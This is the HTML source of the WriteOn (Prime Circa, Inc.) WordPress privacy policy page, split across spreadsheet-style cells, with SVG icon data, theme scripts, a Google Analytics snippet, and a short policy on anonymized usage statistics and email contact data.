    <t>32'&gt;&lt;path d='M19.867 16.592h-3.013v7.408h-2.853v-7.408h-1.995v-2.848h1.995v-2.315c0-1.787 1.301-3.429 3.963-3.429 0.686 0 1.363 0.037 2.029 0.109l-0.083-0.007v2.491h-1.835c-0.96 0-1.221 0.443-1.221 1.179v1.979h3.141z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-fan' viewBox='0 0 32 32'&gt;&lt;path d='M23.312 12.757h-4.171c-0.661 0-0.448-0.288-0.448-0.288 0.282-0.509 0.543-1.105 0.751-1.726l0.022-0.077c0.21-0.512 0.331-1.106 0.331-1.728 0-0.671-0.142-1.309-0.396-1.886l0.012 0.030s-0.448-0.997-1.264-0.901-0.672 0.971-0.672 0.971c-0.001 0.633-0.094 1.244-0.268 1.821l0.012-0.045c-0.158 0.567-0.417 1.061-0.758 1.485l0.006-0.008c-0.533 0.661-1.125 1.264-1.723 1.963-0.752 0.885-1.163 1.44-1.163 2.891v6.859c0 0.645 0.485 0.645 0.485 0.645s6.971-0.176 7.429-0.208c0.549-0.021 1.007-0.394 1.155-0.898l0.002-0.009c0.008-0.050 0.012-0.107 0.012-0.166 0-0.409-0.216-0.768-0.541-0.968l-0.005-0.003c-0.022-0.012-0.037-0.035-0.037-0.061s0.015-0.049 0.037-0.061l0-0c0.58-0.098 1.042-0.512 1.208-1.056l0.003-0.011c0.005-0.041 0.008-0.090 0.008-0.138 0-0.452-0.251-0.845-0.62-1.048l-0.006-0.003c-0.019-0.007-0.033-0.023-0.037-0.042l-0-0c-0.001-0.005-0.002-0.011-0.002-0.017 0-0.033 0.024-0.061 0.055-0.068l0-0c0.667-0.019 1.217-0.499 1.343-1.132l0.001-0.009c0.002-0.030 0.004-0.066 0.004-0.102 0-0.574-0.341-1.069-0.832-1.292l-0.009-0.004c-0.015-0.008-0.026-0.021-0.032-0.037l-0-0c-0.003-0.007-0.005-0.016-0.005-0.025 0-0.030 0.020-0.056 0.047-0.066l0-0c0.638-0.157 1.131-0.652 1.283-1.279l0.002-0.012c0.010-0.055 0.015-0.118 0.015-0.183 0-0.616-0.499-1.115-1.115-1.115-0.043 0-0.085 0.002-0.127 0.007l0.005-0z'&gt;&lt;/path&gt;&lt;path d='M11.243 13.979l-2.709 0.075c-0.409 0-0.741 0.332-0.741 0.741v0 7.365c-0 0.008-0 0.017-0 0.027 0 0.411 0.332 0.744 0.742 0.747h0l2.715-0.075c0.409 0 0.741-0.332 0.741-0.741v0-7.392c0-0.412-0.334-0.747-0.747-0.747v0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-help' viewBox='0 0 32 32'&gt;&lt;path d='M21.019 10.901c-0.595-2.081-2.48-3.579-4.716-3.579-0.030 0-0.059 0-0.089 0.001l0.004-0c-0.070-0.003-0.152-0.005-0.235-0.005-2.267 0-4.191 1.471-4.87 3.51l-0.010 0.036c-0.101 0.343-0.159 0.737-0.159 1.144 0 0.528 0.098 1.033 0.275 1.498l-0.010-0.029c0.17 0.377 0.543 0.634 0.975 0.634 0.589 0 1.067-0.478 1.067-1.067 0-0.124-0.021-0.243-0.060-0.354l0.002 0.007c-0.075-0.206-0.118-0.443-0.118-0.69 0-0.183 0.024-0.361 0.068-0.53l-0.003 0.014c0.411-1.198 1.527-2.044 2.842-2.044 0.072 0 0.143 0.002 0.213 0.007l-0.009-0.001c0.028-0.001 0.061-0.002 0.094-0.002 1.267 0 2.336 0.843 2.679 1.998l0.005 0.020c0.256 0.939-0.309 1.776-1.312 2.816l-0.133 0.139c-1.019 1.067-1.904 1.979-2.469 3.472-0.044 0.112-0.069 0.241-0.069 0.377 0 0.455 0.285 0.843 0.686</t>
  </si>
  <si>
    <t>0.997l0.007 0.002c0.11 0.044 0.238 0.069 0.371 0.069 0.001 0 0.001 0 0.002 0h-0c0.008 0 0.017 0 0.025 0 0.449 0 0.833-0.278 0.991-0.67l0.003-0.007c0.411-1.067 1.067-1.749 2.016-2.752l0.128-0.139c0.779-0.843 2.443-2.571 1.808-4.875z'&gt;&lt;/path&gt;&lt;path d='M17.36 22.811c0 0.736-0.597 1.333-1.333 1.333s-1.333-0.597-1.333-1.333c0-0.736 0.597-1.333 1.333-1.333s1.333 0.597 1.333 1.333z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-home' viewBox='0 0 32 32'&gt;&lt;path d='M23.264 15.195l-6.699-6.699c-0.147-0.138-0.346-0.224-0.565-0.224s-0.418 0.085-0.566 0.224l0-0-6.699 6.699c-0.133 0.142-0.215 0.334-0.215 0.545 0 0.442 0.358 0.8 0.8 0.8 0.211 0 0.403-0.082 0.546-0.215l-0 0 1.333-1.333v7.136c0 0.002-0 0.003-0 0.005 0 0.442 0.358 0.8 0.8 0.8 0 0 0 0 0</t>
  </si>
  <si>
    <t>0h2.133c0.295 0 0.533-0.239 0.533-0.533v0-3.467c0-0.736 0.597-1.333 1.333-1.333s1.333 0.597 1.333 1.333v0 3.467c0 0.295 0.239 0.533 0.533 0.533v0h2.133c0.442 0 0.8-0.358 0.8-0.8v0-7.141l1.333 1.333c0.143 0.148 0.344 0.24 0.565 0.24h0c0.001 0 0.002 0 0.003 0 0.221 0 0.42-0.092 0.562-0.24l0-0c0.146-0.144 0.236-0.344 0.236-0.565s-0.090-0.421-0.236-0.565l-0-0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-instagram' viewBox='0 0 32 32'&gt;&lt;path d='M18.933 16c0 1.62-1.313 2.933-2.933 2.933s-2.933-1.313-2.933-2.933c0-1.62 1.313-2.933 2.933-2.933s2.933 1.313 2.933 2.933z'&gt;&lt;/path&gt;&lt;path d='M20.267 7.467h-8.533c-2.667 0-4.267 1.6-4.267 4.267v8.533c0 2.667 1.6 4.267 4.267 4.267h8.533c2.667 0 4.267-1.6 4.267-4.267v-8.533c0-2.667-1.6-4.267-4.267-4.267zM16 21.067c-2.798 0-5.067-2.268-5.067-5.067s2.268-5.067 5.067-5.067c2.798 0 5.067 2.268 5.067 5.067v0c-0.003 2.797-2.27 5.064-5.066 5.067h-0zM21.333 12c-0.736 0-1.333-0.597-1.333-1.333s0.597-1.333 1.333-1.333c0.736 0 1.333 0.597 1.333 1.333v0c0 0.736-0.597 1.333-1.333 1.333v0z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-like' viewBox='0 0 32 32'&gt;&lt;path d='M19.6 10.4c-1.721 0.006-3.168 1.176-3.594 2.763l-0.006 0.026c-0.432-1.614-1.879-2.784-3.599-2.789h-0.001c-2.416 0-3.072 2.267-3.072 3.664 0 1.776 1.189 3.296 2.795 5.077 1.824 2.043 3.365 3.525 3.877 3.525s2.048-1.483 3.877-3.525c1.6-1.781 2.784-3.301 2.784-5.077 0.005-1.397-0.645-3.664-3.061-3.664z'&gt;&lt;/path&gt;&lt;/symbol&gt;&lt;symbol id='ic-link' viewBox='0 0 32 32'&gt;&lt;path d='M22.971 10.843l-0.48-0.48c-0.647-0.624-1.529-1.008-2.501-1.008-0.015 0-0.030 0-0.046 0l0.002-0c-0.006-0-0.012-0-0.019-0-0.747 0-1.442 0.217-2.028 0.59l0.015-0.009c-0.352 0.24-0.581 0.416-0.581 0.421-0.23 0.136-0.381 0.382-0.381 0.663 0 0.149 0.043 0.289 0.116 0.406l-0.002-0.003c0.133 0.222 0.373 0.368 0.647 0.368 0.003 0</t>
  </si>
  <si>
    <t>0.007-0 0.010-0h-0c0 0 0 0 0.001 0 0.148 0 0.286-0.042 0.403-0.114l-0.003 0.002c0.419-0.391 0.98-0.634 1.598-0.645l0.002-0c0.058-0.003 0.126-0.005 0.195-0.005s0.137 0.002 0.204 0.006l-0.009-0c0.446 0.066 0.833 0.278 1.119 0.586l0.001 0.001 0.48 0.48c0.31 0.314 0.501 0.745 0.501 1.222 0</t>
  </si>
  <si>
    <t>0.007-0 0.015-0 0.022v-0.001c-0.008 0.567-0.241 1.079-0.613 1.451l-2.133 2.133c-0.42 0.363-0.972 0.584-1.575 0.584-0.037 0-0.074-0.001-0.111-0.003l0.005 0c-0.035 0.002-0.076 0.003-0.117 0.0</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US" class="no-js no-svg"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
&lt;script&gt;(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);&lt;/script&gt;
&lt;title&gt;Privacy Policy &amp;#8211; WriteOn&lt;/title&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="WriteOn &amp;raquo; Feed" href="https://www.writeon.cool/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="WriteOn &amp;raquo; Comments Feed" href="https://www.writeon.cool/comments/feed/" /&gt;
		&lt;script type="text/javascript"&gt;
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.writeon.cool\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.25"}};
			! function(t,a,e){var r,n,i,o=a.createElement("canvas"),l=o.getContext&amp;&amp;o.getContext("2d");function c(t){var e=a.createElement("script");e.src=t,e.defer=e.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(e)}for(i=Array("flag","emoji4"),e.supports={everything:!0,everythingExceptFlag:!0},n=0;n&lt;i.length;n++)e.supports[i[n]]=function(t){var e,a=String.fromCharCode;if(!l||!l.fillText)return!1;switch(l.clearRect(0,0,o.width,o.height),l.textBaseline="top",l.font="600 32px Arial",t){case"flag":return(l.fillText(a(55356,56826,55356,56819),0,0),o.toDataURL().length&lt;3e3)?!1:(l.clearRect(0,0,o.width,o.height),l.fillText(a(55356,57331,65039,8205,55356,57096),0,0),e=o.toDataURL(),l.clearRect(0,0,o.width,o.height),l.fillText(a(55356,57331,55356,57096),0,0),e!==o.toDataURL());case"emoji4":return l.fillText(a(55357,56425,55356,57341,8205,55357,56507),0,0),e=o.toDataURL(),l.clearRect(0,0,o.width,o.height),l.fillText(a(55357,56425,55356,57341,55357,56507),0,0),e!==o.toDataURL()}return!1}(i[n]),e.supports.everything=e.supports.everything&amp;&amp;e.supports[i[n]],"flag"!==i[n]&amp;&amp;(e.supports.everythingExceptFlag=e.supports.everythingExceptFlag&amp;&amp;e.supports[i[n]]);e.supports.everythingExceptFlag=e.supports.everythingExceptFlag&amp;&amp;!e.supports.flag,e.DOMReady=!1,e.readyCallback=function(){e. DOMReady=!0},e.supports.everything||(r=function(){e.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",r,!1),t.addEventListener("load",r,!1)):(t.attachEvent("onload",r),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&amp;&amp;e.readyCallback()})),(r=e.source||{}).concatemoji?c(r.concatemoji):r.wpemoji&amp;&amp;r.twemoji&amp;&amp;(c(r.twemoji),c(r.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&lt;link rel='stylesheet' id='wpsm_faq-font-awesome-front-css'  href='https://www.writeon.cool/wp-content/plugins/faq-responsive/assets/css/font-awesome/css/font-awesome.min.css?ver=4.7.25' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpsm_faq_bootstrap-front-css'  href='https://www.writeon.cool/wp-content/plugins/faq-responsive/assets/css/bootstrap-front.css?ver=4.7.25' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='twentyseventeen-fonts-css'  href='https://fonts.googleapis.com/css?family=Libre+Franklin%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C800%2C800i&amp;#038;subset=latin%2Clatin-ext' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='twentyseventeen-style-css'  href='https://www.writeon.cool/wp-content/themes/twentyseventeen/style.css?ver=4.7.25' type='text/css' media='all' /&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>lt IE 9]&gt;
&lt;link rel='stylesheet' id='twentyseventeen-ie8-css'  href='https://www.writeon.cool/wp-content/themes/twentyseventeen/assets/css/ie8.css?ver=1.0' type='text/css' media='all' /&gt;
&lt;! [endif]--&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-includes/js/jquery/jquery.js?ver=1.12.4'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'&gt;&lt;/script&gt;
&lt;!--[if lt IE 9]&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3'&gt;&lt;/script&gt;
&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
&lt;link rel='https://api.w.org/' href='https://www.writeon.cool/wp-json/' /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.writeon.cool/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.writeon.cool/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 4.7.25" /&gt;
&lt;link rel="canonical" href="https://www.writeon.cool/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://www.writeon.cool/?p=683' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.writeon.cool/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.writeon.cool%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.writeon.cool/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.writeon.cool%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;link rel="icon" href="https://www.writeon.cool/wp-content/uploads/2016/12/AppIcon_40.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://www.writeon.cool/wp-content/uploads/2016/12/AppIcon_40.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon-precomposed" href="https://www.writeon.cool/wp-content/uploads/2016/12/AppIcon_40.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://www.writeon.cool/wp-content/uploads/2016/12/AppIcon_40.png" /&gt;
_x005F_x000D_
_x005F_x000D_
&lt;script&gt;_x005F_x000D_
/* WEB DORADO GOOGLE ANALYTICS TRACKING CODE */        (function (i, s, o, g, r, a, m) {_x005F_x000D_
            i['GoogleAnalyticsObject'] = r;_x005F_x000D_
            i[r] = i[r] || function () {_x005F_x000D_
                (i[r].q = i[r].q || []).push(arguments)_x005F_x000D_
            }, i[r].l = 1 * new Date();_x005F_x000D_
            a = s.createElement(o),_x005F_x000D_
            m = s.getElementsByTagName(o)[0];_x005F_x000D_
            a.async = 1;_x005F_x000D_
            a.src = g;_x005F_x000D_
            m.parentNode.insertBefore(a, m)_x005F_x000D_
        })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');_x005F_x000D_
        ga('create', 'UA-16810729-2', 'auto', {'siteSpeedSampleRate': '1' });_x005F_x000D_
    _x005F_x000D_
            ga('send', 'pageview');_x005F_x000D_
    jQuery(document).ready(function () {_</t>
  </si>
  <si>
    <t>x000D_
        jQuery(window).load(function () {_x005F_x000D_
                      //Track Outbound Links_x005F_x000D_
                      jQuery('a[href^="http"]').filter(function () {_x005F_x000D_
                          if (!this.href.match(/.*\.()(\?.*)?$/)) {_x005F_x000D_
                              if (this.href.indexOf('.writeon.cool') == -1) {_x005F_x000D_
                                  return this.href_x005F_x000D_
                              }_x005F_x000D_
                              ;_x005F_x000D_
                          }_x005F_x000D_
                      }).click(function</t>
  </si>
  <si>
    <t>(e) {_x005F_x000D_
                          ga('send', 'event', 'outbound', 'click', this.href);_x005F_x000D_
         });_x005F_x000D_
                  });_x005F_x000D_
    });_x005F_x000D_
_x005F_x000D_
&lt;/script&gt;		&lt;style type="text/css" id="wp-custom-css"&gt;
			#primary .orange-text { color: #ff9500; }
#primary .logo-rounded { border-radius: 16px; }		&lt;/style&gt;
	&lt;/head&gt;
&lt;body class="page-template-default page page-id-683 has-header-image page-one-column colors-light"&gt;
&lt;div id="page" class="site"&gt;
	&lt;a class="skip-link screen-reader-text" href="#content"&gt;Skip to content&lt;/a&gt;
	&lt;header id="masthead" class="site-header" role="banner"&gt;
		&lt;div class="custom-header"&gt;
		&lt;div class="custom-header-media"&gt;
			&lt;div id="wp-custom-header" class="wp-custom-header"&gt;&lt;img src="https://www.writeon.cool/wp-content/uploads/2016/12/homepage_launch_1.jpg" width="2000" height="1200" alt="WriteOn" srcset="https://www.writeon.cool/wp-content/uploads/2016/12/homepage_launch_1.jpg 2000w, https://www.writeon.cool/wp-content/uploads/2016/12/homepage_launch_1-300x180.jpg 300w, https://www.writeon.cool/wp-content/uploads/2016/12/homepage_launch_1-768x461.jpg 768w, https://www.writeon.cool/wp-content/uploads/2016/12/homepage_launch_1-1024x614.jpg 1024w" sizes="100vw" /&gt;&lt;/div&gt;		&lt;/div&gt;
	&lt;div class="site-branding"&gt;
	&lt;div class="wrap"&gt;
		&lt;div class="site-branding-text"&gt;
							&lt;p class="site-title"&gt;&lt;a href="https://www.writeon.cool/" rel="home"&gt;WriteOn&lt;/a&gt;&lt;/p&gt;
							&lt;p class="site-description"&gt;Beautiful handwriting for effective note takers&lt;/p&gt;
					&lt;/div&gt;&lt;!-- .site-branding-text --&gt;
	&lt;/div&gt;&lt;!-- .wrap --&gt;
&lt;/div&gt;&lt;!-- .site-branding --&gt;
&lt;/div&gt;&lt;!-- .custom-header --&gt;
					&lt;div class="navigation-top"&gt;
				&lt;div class="wrap"&gt;
					&lt;nav id="site-navigation" class="main-navigation" role="navigation" aria-label="Top Menu"&gt;
	&lt;button class="menu-toggle" aria-controls="top-menu" aria-expanded="false"&gt;
		&lt;svg class="icon icon-bars" aria-hidden="true" role="img"&gt; &lt;use href="#icon-bars" xlink:href="#icon-bars"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;svg class="icon icon-close" aria-hidden="true" role="img"&gt; &lt;use href="#icon-close" xlink:href="#icon-close"&gt;&lt;/use&gt; &lt;/svg&gt;Menu	&lt;/button&gt;
	&lt;div class="menu-top-menu-container"&gt;&lt;ul id="top-menu" class="menu"&gt;&lt;li id="menu-item-28" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-28"&gt;&lt;a href="https://www.writeon.cool/"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-100" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-100"&gt;&lt;a href="https://www.writeon.cool/notes-plus/"&gt;Notes Plus&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-99" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-99"&gt;&lt;a href="https://www.writeon.cool/inkredible/"&gt;INKredible&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-505" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-505"&gt;&lt;a href="https://www.writeon.cool/lovely/"&gt;Lovely&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-402" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-402"&gt;&lt;a href="https://www.writeon.cool/support/"&gt;Support&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-485" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-485"&gt;&lt;a href="https://www.writeon.cool/about/"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-693" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-683 current_page_item menu-item-693"&gt;&lt;a href="https://www.writeon.cool/privacy-policy/"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
	&lt;/nav&gt;&lt;!-- #site-navigation --&gt;
				&lt;/div&gt;&lt;!-- .wrap --&gt;
			&lt;/div&gt;&lt;!-- .navigation-top --&gt;
	&lt;/header&gt;&lt;!-- #masthead --&gt;
	&lt;div class="site-content-contain"&gt;
		&lt;div id="content" class="site-content"&gt;
&lt;div class="wrap"&gt;
	&lt;div id="primary" class="content-area"&gt;
		&lt;main id="main" class="site-main" role="main"&gt;
&lt;article id="post-683" class="post-683 page type-page status-publish hentry"&gt;
	&lt;header class="entry-header"&gt;
		&lt;h1 class="entry-title"&gt;Privacy Policy&lt;/h1&gt;			&lt;/header&gt;&lt;!-- .entry-header --&gt;
	&lt;div class="entry-content"&gt;
		&lt;p&gt;WriteOn (Prime Circa, Inc.) respects your privacy and will uphold the highest standards to protect it. This policy outlines which data we collect from usage of our apps (Notes Plus, INKredible, and Lovely) and our website (written.cool).</t>
  </si>
  <si>
    <t>By using our apps or by visiting our website, you acknowledge that you accept the practices and policies outlined in this Privacy Policy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data we collect&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; We automatically collect anonymized, aggregated statistical data like the number of visitors per week, the number of created documents or the average time users spend on the site or in the app per session. None of the data we collect allows us or other parties to personally identify you.</t>
  </si>
  <si>
    <t>Neither us nor any other party can access, modify, or read any of your documents that are saved in the app.&lt;/p&gt;
&lt;p&gt;If you contact us via email, or subscribe to our newsletter some personal data, like your name and your email address are collected for the purpose of communication.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Data we do not collect&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; We do not collect any personal information in our app or on our website. We do not have access to content you create in our apps or to files you import into our apps.</t>
  </si>
  <si>
    <t>Your work is your information.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;What we do with the data&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Information collected is solely used to develop and improve the user experience and the product or website. No personal information is collected and all information is anonymized and aggregated before use. We neither rent nor sell any information that we collect.&lt;/p&gt;
&lt;p&gt;All information you provide us with voluntarily by subscribing to our newsletter or consulting our support via email will only be used by us for communication, such as helping you to solve support requests or sending regular newsletters via email.</t>
  </si>
  <si>
    <t>No data will be disclosed by us to any third parties.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Changes to this Privacy Policy&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; We may amend this Privacy Policy from time to time. Use of information we collect now is subject to the Privacy Policy in effect at the time such information is used.</t>
  </si>
  <si>
    <t>If we make changes in the way we use information, we will update this page. Users are bound by any changes to the Privacy Policy when he or she uses the product or website after such changes have been first posted.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Questions or Concerns&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Please feel free to email us at info@writeon.cool&lt;/p&gt;
	&lt;/div&gt;&lt;!-- .entry-content --&gt;
&lt;/article&gt;&lt;!--</t>
  </si>
  <si>
    <t>#post-## --&gt;
		&lt;/main&gt;&lt;!-- #main --&gt;
	&lt;/div&gt;&lt;!-- #primary --&gt;
&lt;/div&gt;&lt;!-- .wrap --&gt;
		&lt;/div&gt;&lt;!-- #content --&gt;
		&lt;footer id="colophon" class="site-footer" role="contentinfo"&gt;
			&lt;div class="wrap"&gt;
	&lt;aside class="widget-area " role="complementary" aria-label="Footer"&gt;
					&lt;div class="widget-column footer-widget-1"&gt;
				&lt;section id="text-8" class="widget widget_text"&gt;&lt;h2 class="widget-title"&gt;Contact Us&lt;/h2&gt;			&lt;div class="textwidget"&gt;&lt;p&gt;&lt;strong&gt;Email&lt;/strong&gt;&lt;br</t>
  </si>
  <si>
    <t>/&gt;info@writeon.cool&lt;/p&gt;&lt;/div&gt;
		&lt;/section&gt;			&lt;/div&gt;
					&lt;div class="widget-column footer-widget-2"&gt;
				&lt;section id="search-4" class="widget widget_search"&gt;&lt;h2 class="widget-title"&gt;Search&lt;/h2&gt;
&lt;form role="search" method="get" class="search-form" action="https://www.writeon.cool/"&gt;
	&lt;label for="search-form-6437375841a62"&gt;
		&lt;span class="screen-reader-text"&gt;Search for:&lt;/span&gt;
	&lt;/label&gt;
	&lt;input type="search" id="search-form-6437375841a62" class="search-field" placeholder="Search &amp;hellip;" value="" name="s" /&gt;
	&lt;button type="submit" class="search-submit"&gt;&lt;svg class="icon icon-search" aria-hidden="true" role="img"&gt; &lt;use href="#icon-search" xlink:href="#icon-search"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;span class="screen-reader-text"&gt;Search&lt;/span&gt;&lt;/button&gt;
&lt;/form&gt;
 &lt;/section&gt;			&lt;/div&gt;
			&lt;/aside&gt;&lt;!-- .widget-area --&gt;
					&lt;nav class="social-navigation" role="navigation" aria-label="Footer Social Links Menu"&gt;
						&lt;div class="menu-social-links-menu-container"&gt;&lt;ul id="menu-social-links-menu" class="social-links-menu"&gt;&lt;li id="menu-item-33" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-33"&gt;&lt;a href="https://www.facebook.com/NotesPlusApp"&gt;&lt;span class="screen-reader-text"&gt;Facebook&lt;/span&gt;&lt;svg class="icon icon-facebook" aria-hidden="true" role="img"&gt; &lt;use href="#icon-facebook" xlink:href="#icon-facebook"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-34" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-34"&gt;&lt;a href="https://twitter.com/aplusatwork"&gt;&lt;span class="screen-reader-text"&gt;Twitter&lt;/span&gt;&lt;svg class="icon icon-twitter" aria-hidden="true" role="img"&gt; &lt;use href="#icon-twitter" xlink:href="#icon-twitter"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-341" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-341"&gt;&lt;a href="https://www.youtube.com/user/notesplus"&gt;&lt;span class="screen-reader-text"&gt;Youtube&lt;/span&gt;&lt;svg class="icon icon-youtube" aria-hidden="true" role="img"&gt; &lt;use href="#icon-youtube" xlink:href="#icon-youtube"&gt;&lt;/use&gt; &lt;/svg&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;					&lt;/nav&gt;&lt;!-- .social-navigation --&gt;
				&lt;div class="site-info"&gt;
		&lt;a href="https://wordpress.org/" class="imprint"&gt;
		Proudly powered by WordPress	&lt;/a&gt;
&lt;/div&gt;&lt;!-- .site-info --&gt;
			&lt;/div&gt;&lt;!-- .wrap --&gt;
		&lt;/footer&gt;&lt;!--</t>
  </si>
  <si>
    <t>#colophon --&gt;
	&lt;/div&gt;&lt;!-- .site-content-contain --&gt;
&lt;/div&gt;&lt;!-- #page --&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-content/plugins/faq-responsive/assets/js/bootstrap.js?ver=4.7.25'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-content/plugins/faq-responsive/assets/js/accordion.js?ver=4.7.25'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;! [CDATA[ */
var twentyseventeenScreenReaderText = {"quote":"&lt;svg class=\"icon icon-quote-right\" aria-hidden=\"true\" role=\"img\"&gt; &lt;use href=\"#icon-quote-right\" xlink:href=\"#icon-quote-right\"&gt;&lt;\/use&gt; &lt;\/svg&gt;","expand":"Expand child menu","collapse":"Collapse child menu","icon":"&lt;svg class=\"icon icon-angle-down\" aria-hidden=\"true\" role=\"img\"&gt; &lt;use href=\"#icon-angle-down\" xlink:href=\"#icon-angle-down\"&gt;&lt;\/use&gt; &lt;span class=\"svg-fallback icon-angle-down\"&gt;&lt;\/span&gt;&lt;\/svg&gt;"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js?ver=1.0'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-content/themes/twentyseventeen/assets/js/navigation.js?ver=1.0'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-content/themes/twentyseventeen/assets/js/global.js?ver=1.0'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js?ver=2.1.2'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.writeon.cool/wp-includes/js/wp-embed.min.js?ver=4.7.25'&gt;&lt;/script&gt;
&lt;svg style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
&lt;defs&gt;
&lt;symbol id="icon-behance" viewBox="0 0 37 32"&gt;
&lt;path class="path1" d="M33 6.054h-9.125v2.214h9.125v-2.214zM28.5 13.661q-1.607 0-2.607 0.938t-1.107 2.545h7.286q-0.321-3.482-3.571-3.482zM28.786 24.107q1.125 0 2.179-0.571t1.357-1.554h3.946q-1.786 5.482-7.625 5.482-3.821 0-6.080-2.357t-2.259-6.196q0-3.714 2.33-6.17t6.009-2.455q2.464 0 4.295 1.214t2.732 3.196 0.902</t>
  </si>
  <si>
